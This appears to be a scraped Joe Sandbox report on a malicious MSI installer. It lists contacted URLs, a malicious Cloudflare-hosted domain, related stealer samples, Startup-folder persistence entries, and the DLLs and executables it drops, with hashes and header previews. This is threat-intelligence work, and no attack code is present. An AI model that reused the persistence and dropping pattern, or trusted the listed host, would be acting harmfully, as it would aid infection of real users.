                                                                        http://www.softwareok.com/?Download=Find.Same.Images.OKcmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000000.2210893352.00000001401F4000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000000.2808211879.00000001401F4000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://support.mozilla.orgcomvalidate_ljv3.exe, 0000000A.00000002.2629974281.0000000007E0F000.00000004.00001000.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2629974281.0000000007E08000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.surfok.de/comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.catcert.cat/verCIT-10xIDRBackup.exe, 00000002.00000003.1794674843.0000000004221000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://crl.vcomvalidate_ljv3.exe, 0000000A.00000003.2430835895.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2411731136.00000000004BE000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2464101114.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2528549271.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2597643516.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2488660096.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2569610517.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2488817743.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2548380575.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2618354577.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2571029868.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2431217978.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2618939343.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2508050889.00000000004AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://epscd.catcert.net/crl/ec-acc.crlIDRBackup.exe, 00000002.00000003.1794674843.0000000004221000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://ocsp.catcert.cat05IDRBackup.exe, 00000002.00000003.1794674843.0000000004221000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://www.softwareok.comIDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2631544073.00000001401E0000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.sqlite.org/copyright.html.IDRBackup.exe, 00000002.00000002.1821626167.0000000061EB1000.00000008.00000001.01000000.00000009.sdmp, IDRBackup.exe, 00000002.00000003.1794674843.0000000004221000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    		high

                                                                                    World Map of Contacted IPs

                                                                                    • No. of IPs < 25%
                                                                                    • 25% < No. of IPs < 50%
                                                                                    • 50% < No. of IPs < 75%
                                                                                    • 75% < No. of IPs

                                                                                    Public IPs

                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                    172.67.141.133
                                                                                    		gakaroli.onlineUnited States
                                                                                    		13335CLOUDFLARENETUStrue

                                                                                    General Information

                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                    Analysis ID:1565498
                                                                                    Start date and time:2024-11-30 02:23:08 +01:00
                                                                                    Joe Sandbox product:CloudBasic
                                                                                    Overall analysis duration:0h 8m 53s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:default.jbs
                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                    Number of analysed new started processes analysed:21
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:1
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Sample name:ONHQNHFT.msi
                                                                                    Detection:MAL
                                                                                    Classification:mal100.spyw.expl.evad.winMSI@21/48@1/1
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 66.7%
                                                                                    HCA Information:Failed
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .msi

                                                                                    Warnings

                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                    • Execution Graph export aborted for target IDRBackup.exe, PID 7680 because there are no executed function
                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                    Simulations

                                                                                    Behavior and APIs

                                                                                    TimeTypeDescription
                                                                                    01:24:39AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT9FDB.tmp
                                                                                    01:24:52AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ProtectWordpad5.lnk
                                                                                    20:25:02API Interceptor11x Sleep call for process: comvalidate_ljv3.exe modified
                                                                                    20:25:50API Interceptor1x Sleep call for process: cmd.exe modified

                                                                                    Joe Sandbox View / Context

                                                                                    IPs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    172.67.141.133https://r20.rs6.net/tn.jsp?f=001f5R_iJCwaFy49KkbzzyyG4Gc6gyTfnyF-0mhORlSg_GR3SvOTDN03S6edK3VV6C0wOWEEQfDU743cm6x7W7DirsNJeW2r-yGUj4weXSaeenqMKeVfYL4uy2hD6pzA4F_cl3ygeWjsY7t6zZAZCvAgA==&c=&ch=/#oba3NpbW1vbnNAcHJvbGlzdC5jb20=Get hashmaliciousHTMLPhisherBrowse

                                                                                      Domains

                                                                                      No context

                                                                                      ASNs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 172.67.165.166
                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 172.67.165.166
                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                                                                      • 104.21.75.163
                                                                                      file.exeGet hashmaliciousHackBrowser, XmrigBrowse
                                                                                      • 104.16.123.96
                                                                                      https://thunderstore.io/package/download/Grad/HiddenUnits/1.3.0/Get hashmaliciousUnknownBrowse
                                                                                      • 104.26.14.210
                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 172.67.165.166
                                                                                      siveria.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                      • 104.26.13.205
                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 172.67.167.249
                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 172.67.165.166
                                                                                      file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, StealcBrowse
                                                                                      • 104.21.16.9

                                                                                      JA3 Fingerprints

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 172.67.141.133
                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 172.67.141.133
                                                                                      RezQY7jWu8.exeGet hashmaliciousXRedBrowse
                                                                                      • 172.67.141.133
                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                                                                      • 172.67.141.133
                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 172.67.141.133
                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 172.67.141.133
                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 172.67.141.133
                                                                                      file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, StealcBrowse
                                                                                      • 172.67.141.133
                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 172.67.141.133
                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 172.67.141.133

                                                                                      Dropped Files

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exees.htaGet hashmaliciousUnknownBrowse
                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                                                            MOD_200.pdf.lnkGet hashmaliciousArc StealerBrowse
                                                                                              C:\Users\user\AppData\Local\Temp\Aplanogamete\datastate.dlles.htaGet hashmaliciousUnknownBrowse

                                                                                                Created / dropped Files

                                                                                                C:\Config.Msi\69034e.rbs

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:data
                                                                                                Category:modified
                                                                                                Size (bytes):9984
                                                                                                Entropy (8bit):5.705522191667074
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:v5KD/9BYWf34svsasz1Doi7eAXoXBwU07CsThqwU07C6jlYXCXcPThqAHS2FXhNg:vicWf34C1g1Doi7eJP0GII0GrTbrpG
                                                                                                MD5:C9FA159FC780A7C04DAFACC8526F80F6
                                                                                                SHA1:F81F124C561DDE1C499EF71503233A44775C9463
                                                                                                SHA-256:854576BF8812E27351D1F647BAAC259CF1E2A57882AA7D252F7D703EFD5C0931
                                                                                                SHA-512:3D8EA11AB8002E7FB00A8C137BB1D160D049C0D138CF60E1D532DFB0DEF35B92319A34106932EDF5AA746EF969AC76F80AE92B01A06940AA8A110D0E6398E765
                                                                                                Malicious:false
                                                                                                Preview:...@IXOS.@.....@..}Y.@.....@.....@.....@.....@.....@......&.{4D89D5F7-3F05-4FE5-88CD-06F9F4B7FE68}..Gratin..ONHQNHFT.msi.@.....@.....@.....@........&.{F8287FD5-FF2A-4270-84E3-45317986F30E}.....@.....@.....@.....@.......@.....@.....@.......@......Gratin......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{E20E89CA-95F6-5DEE-87C2-2010D7F7BD02}&.{4D89D5F7-3F05-4FE5-88CD-06F9F4B7FE68}.@......&.{C563E190-FFF5-5EB2-96EE-2ABF7AD28F4C}&.{4D89D5F7-3F05-4FE5-88CD-06F9F4B7FE68}.@......&.{61B0744F-3BCA-52D6-B8E9-FDAED81FE5E3}&.{4D89D5F7-3F05-4FE5-88CD-06F9F4B7FE68}.@......&.{2686B041-402A-53FD-9258-4FE6A6C3E662}&.{4D89D5F7-3F05-4FE5-88CD-06F9F4B7FE68}.@......&.{95C0C730-48E2-51E1-AD09-926C08DAB44F}&.{4D89D5F7-3F05-4FE5-88CD-06F9F4B7FE68}.@......&.{00147D0D-6F7D-5B3D-8B15-2118E97654A9}&.{4D89D5F7-3F05-4FE5-88CD-06F9F4B7FE68}.@......&.{354D43C3-7E39-50BC-B4D6-BAA6879B7DBF}&.{4D89D5F7-3F05-4FE5-88CD-06F9F

                                                                                                C:\Users\user\AppData\Local\Temp\15b70465

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):5662857
                                                                                                Entropy (8bit):7.71787152804132
                                                                                                Encrypted:false
                                                                                                SSDEEP:98304:ERR//Nnr5YXNOnk7bxSCsPcp6zpHkZZFG2SNme2WKKk:ERR//V5I0CNeHyY2SNmlW1k
                                                                                                MD5:E85641DE34CE9C7FBE355D501F33CFE4
                                                                                                SHA1:D83E45325FB6651D3812CBDF0600BA6FF6C7EF88
                                                                                                SHA-256:DBB65F07DE18222E2D40C0B2C95CC0287F76B8919B5D2226D091CB0E3C0411AD
                                                                                                SHA-512:9B4A83EE18058DE22B2A78F771696809FC4806D61C7FEAA1165D30F88D52FC652C5CBB0263FF445F5FB795834FD011E8078DC9ED4324C43545329EC20AA10513
                                                                                                Malicious:false
                                                                                                Preview:..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................../.YKN.]Z/.Dri.fhe.}G].g.e.zGY.hi~.D~d.UKx.nik.zGY.hi~.y.............................................I.@uc.`zf.s~O.......................................................................................I.Jio.}~C.zok.j~..................................................................................../.@UN.[>V.`xx.ztl.'UO.U]x.d~}.{p....................................................................|.'+$.9,8...........................................

                                                                                                C:\Users\user\AppData\Local\Temp\33b2489b

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):5662857
                                                                                                Entropy (8bit):7.717871592775653
                                                                                                Encrypted:false
                                                                                                SSDEEP:98304:LRR//Nnr5YXNOnk7bxSCsPcp6zpHkZZFG2SNme2WKKk:LRR//V5I0CNeHyY2SNmlW1k
                                                                                                MD5:41C90084229BBC492F8488511E0BC9E5
                                                                                                SHA1:15F06E9BE70CAC2E63E2BA9F7E905BD3AA09FE2D
                                                                                                SHA-256:D2B75C1033542E7B3FECA25014C2A7F3A61CC162021E7DB1DD1B8A24ACB94A14
                                                                                                SHA-512:426CC0542EF0A75E6D698E1EA30E1D0012EEC811815CC7D611A7D19A91E75E46D9D632E75F7EFE7BE60330EAC81BC60CD94B5A60C64ED8503284024668A5E3A8
                                                                                                Malicious:false
                                                                                                Preview:..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................../.YKN.]Z/.Dri.fhe.}G].g.e.zGY.hi~.D~d.UKx.nik.zGY.hi~.y.............................................I.@uc.`zf.s~O.......................................................................................I.Jio.}~C.zok.j~..................................................................................../.@UN.[>V.`xx.ztl.'UO.U]x.d~}.{p....................................................................|.'+$.9,8...........................................

                                                                                                C:\Users\user\AppData\Local\Temp\41530b8a

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):5662857
                                                                                                Entropy (8bit):7.717871305623548
                                                                                                Encrypted:false
                                                                                                SSDEEP:98304:HRR//Nnr5YXNOnk7bxSCsPcp6zpHkZZFG2SNme2WKKk:HRR//V5I0CNeHyY2SNmlW1k
                                                                                                MD5:425A57A1482E280D071DE0ECA44CBA58
                                                                                                SHA1:5C514469B5725F1AAE37CED64D875563F027B523
                                                                                                SHA-256:688C51D5E57049E4EF9D07173E13BCBB4DEE236051FD170C832AABB281FE1F56
                                                                                                SHA-512:92C227D2E1A9C14DC83B2F3BB59AF5C4C2F05A228800EF890929AC05C6AE34009E44D06D3D18DA0DA5705EA29AC949DC8A942C20F2D5A51519EB076FCC131FA9
                                                                                                Malicious:false
                                                                                                Preview:..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................../.YKN.]Z/.Dri.fhe.}G].g.e.zGY.hi~.D~d.UKx.nik.zGY.hi~.y.............................................I.@uc.`zf.s~O.......................................................................................I.Jio.}~C.zok.j~..................................................................................../.@UN.[>V.`xx.ztl.'UO.U]x.d~}.{p....................................................................|.'+$.9,8...........................................

                                                                                                C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):2137808
                                                                                                Entropy (8bit):6.8117077805342365
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:fsLSdP5XOFS5DbCVVtBF8SIIa0awy+qW5M8hbGY7WVaQX/VjjFD7YpmTfWD3B7jn:ELmVOFUK1JIIa0awN5d7WVaQX1T+z9D
                                                                                                MD5:371C165E3E3C1A000051B78D7B0E7E79
                                                                                                SHA1:2A2ECBBD4840C486B3507A18307369336EC5A1AA
                                                                                                SHA-256:5AE3838D77C2102766538F783D0A4B4205E7D2CDBA4E0AD2AB332DC8AB32FEA9
                                                                                                SHA-512:4E6BD3F85C71A8FF0DB1E92675295D5BBD0EE8CF24D4DF4150A922E9C25FA1F7116263AC4E55C9A9420416FD0388DB593C1FE43D22D0A8D25CAA20EEB13F5080
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                Joe Sandbox View:
                                                                                                • Filename: es.hta, Detection: malicious, Browse
                                                                                                • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                • Filename: MOD_200.pdf.lnk, Detection: malicious, Browse
                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....Yif.....................~....................@...........................$.....%. ..........@...................................................8 ..f.......$......................................................,"...........................text...h........................... ..`.itext.............................. ..`.data...@...........................@....bss.....................................idata..............................@....tls.........p...........................rdata..............................@..@.reloc...$.......&...0..............@..B.rsrc................V..............@..@.............`".....................@..@................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\Aplanogamete\datastate.dll

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):60928
                                                                                                Entropy (8bit):6.076596555078833
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:2d3yLVTcRkZrVlqE6BY6TalNPzrrSRTy3IXGX8prYXDRMLu8Vp4:GCpTzriE6BYrrJIXJpCRM68Vp4
                                                                                                MD5:F2986DC64A9ECCFAD317CB01A42954BC
                                                                                                SHA1:84838D33FDE059E3AED7AD38B09642C802F0EAC8
                                                                                                SHA-256:86C75285D2E51B8E5BA2191C6B1888BBE69437B767E19C530771C08F6FAC7C46
                                                                                                SHA-512:B8DE5D2450B7685A865A3565965E786745E63ADB4F926896DD67D6E1BEA802FCD2A03A61E464CA1F7153FF90A0582E92D0946A558F4FC7468CA035853C7E5E73
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                Joe Sandbox View:
                                                                                                • Filename: es.hta, Detection: malicious, Browse
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!.O.@...@...@..h....@...8...@...8...@......@...@...@...8...@...8...@.......@...8...@..Rich.@..................PE..L.....&]...........!.........X......n5.......................................0............@.....................................<.......................................................................@...............(............................text...S........................... ..`.rdata..b-..........................@..@.data...d...........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\Aplanogamete\hso

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):4526833
                                                                                                Entropy (8bit):7.966185784897977
                                                                                                Encrypted:false
                                                                                                SSDEEP:98304:HNfg5MzZZKcUrhgrhiNcqM7VFHrCgRUVpS5QMsWpBs3KKLnb9owzajg+l1:HuKZBYwhiNcqM7npRsS5QMD8jb9owu1
                                                                                                MD5:AE698161CA0CD6BAF53788C39B7D55A8
                                                                                                SHA1:C03513DC4712FE46517159FAF2D7BCCDF4DA2C58
                                                                                                SHA-256:ED4905E10A4416F1C878EBBADAEC55A76490BAF8B9EDBBD99DB17FB62311FF64
                                                                                                SHA-512:A6D4391E39C77A30900B7FB377060E233FF5D7A770BF0979CACC88108263BF4BFBEE369BD95A4AFF07C99EE20B12A15D9B9BF399B33645614985239B5CCFC44B
                                                                                                Malicious:false
                                                                                                Preview:x..b\...wc.x..^....\.RFT..EN.Eu...I.CUP..em.W.....R.bX....Q....P.Mhu...^.m[..jc...E.X..q..O..]....EL]Ce.....Zx.UC...issEw].GoS.dEviIT.Vk...kt.O..x...ak..jL.Am....pLJ..._..PZ..e..\.pqW......KU^....c.\....YGP]kGb...o.qb.B.FYsE.M..mUB..S..._._._.v.m.\lF..hCN......`...A..dW...if[.....qYMk..UG.K..OOnFX`.h.....I.Y..L..`..N..Rnm.Bplo.Vv...O.._d_qP..Y...Bv.ef\...PH.H..._.CXFA.r.....pNEI......d......s..._....v.....gBoGA.Zus..J.m\.I.X....V..Kyh[jJ.[i.q.h...V..y._QQ....w...X..a.hJ.h......Lk.i....L......F.a.....[.VZTf.ol.La...o.\.Pt...R.R..D.b..I...t.Ab...r.v.......]n.JVF...G`.b...MjVLJ.eaak._dE..Q.Sx......b...N.k.DL.o.q^Hy.Z...ZJ..l.Rrhu.NP.U.lKB.\.G.y.f.rEq.Pj.U.v.[q..LV...YM.DyX.fK.eg.S.....r...ksY.p.].B.k_.l.l.S...L.D..eT[k.K...V..`q.X.\.Dh.J\.hKd..^mi....`..mZVU.....d..`IF.x......smJcs......ot.ta.q.k...Sk.C.C.M..q.n..KN.f..M.X.H..Q`kLa.P...w..^V...f.o.Y..lZXg.c.l...B.glv.....e.a.PbW.DE..TpRCSOMM.q..pY.y..a.Z...N...Mv^QM.o..M.i..e^..T.Jtx.NcAI.^..^P^..TJ.x..c..L..ej..^...k[l.Fk.....m..t..JP`D.

                                                                                                C:\Users\user\AppData\Local\Temp\Aplanogamete\madbasic_.bpl

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):214016
                                                                                                Entropy (8bit):6.88876124830787
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:wN/kSQxE6qeM/k4qTl5L5e5+53WCG1CbF/Frf1:PqeM/k4qR5L5e5+53WulZ1
                                                                                                MD5:DC6655A38FFDC3C349F13828FC8EC36E
                                                                                                SHA1:95DB71EF7BFF8C16CE955C760292BAD9F09BB06D
                                                                                                SHA-256:16126FF5DAA3787A159CF4A39AA040B8050EBB66AB90DBB97C503110EF72824A
                                                                                                SHA-512:84B85F2AAAD773CBE039022DB3D0C35263343243F0D021D7AA3086904B80DD309E6D2A93613CC774B5DB27335F4D2850151E2BC8F4648B0065F66BD3722C3D69
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...[..V.............................0.......@.....W.................................................................0...d......`(......x................@......................".......................................0............................text...x........................... ..`.itext.......0...................... ..`.data...l&...@...(..................@....bss........p.......@...................idata..`(.......*...@..............@....edata...d...0...f...j..............@..@.rdata.."...........................@..@.reloc..............................@..B.rsrc...x...........................@..@....................................@..@................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\Aplanogamete\maddisAsm_.bpl

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):62976
                                                                                                Entropy (8bit):6.769493849077948
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:RhaUyLDjc8SqMhnJ/zq0siFsjB5mYdWtC16+C+024bQJu0D3BIBo1w4Kv57dbhrC:RNy3eqMne0sXB0IWtCLwEJhY0w1SD
                                                                                                MD5:84BC072F8EA30746F0982AFBDA3C638F
                                                                                                SHA1:F39343933FF3FC7934814D6D3B7B098BC92540A0
                                                                                                SHA-256:52019F47F96CA868FA4E747C3B99CBA1B7AA57317BF8EBF9FCBF09AA576FE006
                                                                                                SHA-512:6E7648194738E8E49E48C2450EEF1D482473CD4E5C0E83F292AC9174488F3F22A3B6BA96F07E024C2AB96613D9DB1A97084CA0B3973ED5D88502E0D28E120EF5
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...[..V.................z...8......4..............W......................... ......~{..................................&.......d........................@......T...............#....................................................................text...4w.......x.................. ..`.itext..<............|.............. ..`.data................~..............@....bss.....................................idata..d...........................@....edata..&...........................@..@.rdata..#...........................@..@.reloc..T...........................@..B.rsrc...............................@..@............. ......................@..@................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\Aplanogamete\madexcept_.bpl

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):445440
                                                                                                Entropy (8bit):6.727415549986866
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:mlAz49EKhEV30F8sl88nTjQ4Q50gEcW/jd+o72niVUNMa4Yn2c:mlG4ut30F8slzYlQcW/jd++2nJ6u2c
                                                                                                MD5:21068DFD733435C866312D35B9432733
                                                                                                SHA1:3D5336C676D3DD94500D0D2FE853B9DE457F10FD
                                                                                                SHA-256:835F1141ECE59C36B18E76927572D229136AEB12EFF44CB4BA98D7808257C299
                                                                                                SHA-512:54664A9E60E5A0B148FC4684125B7EAC9CFC57D0BC5838204ED587D62E44C3347C0BAE3192D5C375B6A74335B4FED4FC53248BA542C59022E9761872E09E3EE7
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...f..V.................H...@......<c.......p.....Y.....................................................................O......._......D<...............@...P...A...........@..$...................................l...x............................text....C.......D.................. ..`.itext..D....`.......H.............. ..`.data...t....p.......L..............@....bss....H............Z...................idata..._.......`...Z..............@....edata...O.......P..................@..@.rdata..$....@......................@..@.reloc...A...P...B..................@..B.rsrc...D<.......>...N..............@..@.....................R..............@..@................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\Aplanogamete\qvi

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):10135
                                                                                                Entropy (8bit):6.530994651641475
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:YDdCjuwKxx0Iz3YDkI+eF/CpUZK794s8epq1Zo+VI+uMiDkknW9dRsaAtQxp952d:YBHOIz3YoI+eF68leE3/VYYj5Ds
                                                                                                MD5:C7E234FA36DBC2C97D2ED3974A437417
                                                                                                SHA1:41A8BB3540920F868EA669B909E61071E16497F8
                                                                                                SHA-256:ED115985C0DB3516AE57B9E2D2B8472EBA69F31ACCF7D6A078049B269958CE1C
                                                                                                SHA-512:259A929CD6665F6EC8640E629668E4A90D3261C2B1987A1DD5C51175CCA7CA9B03DF09BEFC9EAB4543F726B6423F393735CEEBF00AD2741DB0D5F14DB732AE11
                                                                                                Malicious:false
